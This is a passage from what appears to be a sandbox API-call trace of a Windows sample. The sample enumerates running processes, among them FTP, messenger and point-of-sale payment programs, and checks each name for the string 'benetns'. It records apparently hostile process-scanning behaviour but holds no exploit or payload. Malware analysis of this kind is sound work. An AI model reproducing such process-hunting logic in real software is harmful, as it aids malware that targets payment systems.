cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0177.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.792] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582300 [0177.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.792] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0177.792] StrStrIA (lpFirst="smartftp.exe", lpSrch="benetns") returned 0x0 [0177.792] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0177.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.794] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582330 [0177.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3582330, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0177.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0177.794] StrStrIA (lpFirst="totalcmd.exe", lpSrch="benetns") returned 0x0 [0177.794] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0177.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.795] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582390 [0177.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3582390, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0177.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0177.795] StrStrIA (lpFirst="trillian.exe", lpSrch="benetns") returned 0x0 [0177.796] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0177.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.797] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582288 [0177.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3582288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0177.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0177.797] StrStrIA (lpFirst="webdrive.exe", lpSrch="benetns") returned 0x0 [0177.797] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0177.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.799] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582120 [0177.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3582120, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0177.799] StrStrIA (lpFirst="whatsapp.exe", lpSrch="benetns") returned 0x0 [0177.799] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0177.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.801] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35822b8 [0177.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35822b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0177.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0177.801] StrStrIA (lpFirst="winscp.exe", lpSrch="benetns") returned 0x0 [0177.801] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0177.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.802] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595f28 [0177.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3595f28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0177.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0177.803] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="benetns") returned 0x0 [0177.803] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0177.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.804] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595fc8 [0177.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3595fc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0177.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0177.804] StrStrIA (lpFirst="active-charge.exe", lpSrch="benetns") returned 0x0 [0177.805] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0177.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.806] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582198 [0177.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3582198, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0177.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0177.806] StrStrIA (lpFirst="accupos.exe", lpSrch="benetns") returned 0x0 [0177.806] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0177.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.808] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582348 [0177.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3582348, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0177.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0177.808] StrStrIA (lpFirst="afr38.exe", lpSrch="benetns") returned 0x0 [0177.808] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0177.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.810] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582150 [0177.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3582150, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0177.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0177.810] StrStrIA (lpFirst="aldelo.exe", lpSrch="benetns") returned 0x0 [0177.810] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0177.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.811] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3582360 [0177.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3582360, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0177.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0177.812] StrStrIA (lpFirst="ccv_server.exe", lpSrch="benetns") returned 0x0 [0177.812] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0177.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.813] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3596008 [0177.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3596008, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0177.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0177.813] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="benetns") returned 0x0 [0177.813] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0177.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.815] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35961a8 [0177.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35961a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0177.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0177.815] StrStrIA (lpFirst="creditservice.exe", lpSrch="benetns") returned 0x0 [0177.815] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0177.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.816] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35822d0 [0177.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35822d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0177.816] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0177.817] StrStrIA (lpFirst="edcsvr.exe", lpSrch="benetns") returned 0x0 [0177.817] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0177.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.818] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582378 [0177.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3582378, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0177.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0177.818] StrStrIA (lpFirst="fpos.exe", lpSrch="benetns") returned 0x0 [0177.818] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0177.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.820] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35823c0 [0177.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35823c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0177.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0177.820] StrStrIA (lpFirst="isspos.exe", lpSrch="benetns") returned 0x0 [0177.820] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0177.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.821] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595fa8 [0177.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3595fa8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0177.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0177.821] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="benetns") returned 0x0 [0177.822] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0177.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.962] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584b98 [0177.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3584b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0177.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0177.962] StrStrIA (lpFirst="omnipos.exe", lpSrch="benetns") returned 0x0 [0177.962] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0177.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.963] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584d18 [0177.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3584d18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0177.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0177.963] StrStrIA (lpFirst="spcwin.exe", lpSrch="benetns") returned 0x0 [0177.963] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0177.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.964] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3596048 [0177.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0177.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0177.964] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="benetns") returned 0x0 [0177.964] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0177.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.966] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584cd0 [0177.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3584cd0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0177.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0177.966] StrStrIA (lpFirst="utg2.exe", lpSrch="benetns") returned 0x0 [0177.966] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0177.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.967] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584c28 [0177.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3584c28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0177.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0177.967] StrStrIA (lpFirst="saying.exe", lpSrch="benetns") returned 0x0 [0177.967] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0177.968] 